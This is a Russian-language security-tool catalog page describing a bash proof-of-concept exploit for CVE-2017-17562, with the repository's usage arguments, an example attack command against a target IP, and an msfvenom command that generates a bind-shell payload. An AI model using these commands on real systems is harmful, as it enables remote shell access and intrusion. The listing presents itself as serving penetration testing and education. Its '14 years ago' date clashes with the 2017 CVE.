Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
bash-CVE-2017-17562 — PoC для CVE-2017-17562, написанный на bash | Kitploit
Инструменты/GitHubGitHub/joaomagfreitas/bash-cve-2017-17562
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеArchived
GitHubjoaomagfreitas/bash-cve-2017-17562

bash-CVE-2017-17562

PoC для CVE-2017-17562, написанный на bash

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

bash-CVE-2017-17562

Реализация PoC на Bash для CVE-2017-17562.

Требуется curl для создания HTTP-запросов.

Основано на реализациях Metasploit и @fssecur3.

Аргументы

Следующие аргументы обязательны для разведки и отправки полезной нагрузки:

root@kitploit:~
$1: IP/Host of remote vulnerable machine being attacked
$2: Port of remote machine webserver
$4: Path to crafted payload being sent to vulnerable machine

Опционально можно также задать следующие аргументы:

root@kitploit:~
$3: If the web server is running under a TLS/SSL tunnel. Defaults to no
$5: Path to list of known vulnerable CGI endpoints, to be used in reconnaissance phase. Defaults to "cgi.endpoints"

Пример

root@kitploit:~
bash exploit.bash 192.168.1.1 80 yes payload.so cgi.endpoints

Отказ от ответственности

Данный код предназначен только для обучения и демонстрации. Не используйте его для целей, на которые у вас нет разрешения.

В этом репозитории не предоставляются полезные нагрузки (payloads). Однако любой бинарный файл, соответствующий архитектуре ОС цели, должен работать. Для создания полезной нагрузки bind shell вы можете использовать msfvenon:

root@kitploit:~
msfvenom -a <instruction_set> --platform <os> -p generic/shell_bind_tcp LHOST=<attacker_ip_address> LPORT=<target_bind_port> -f elf-so -o payload.so
Скачать инструмент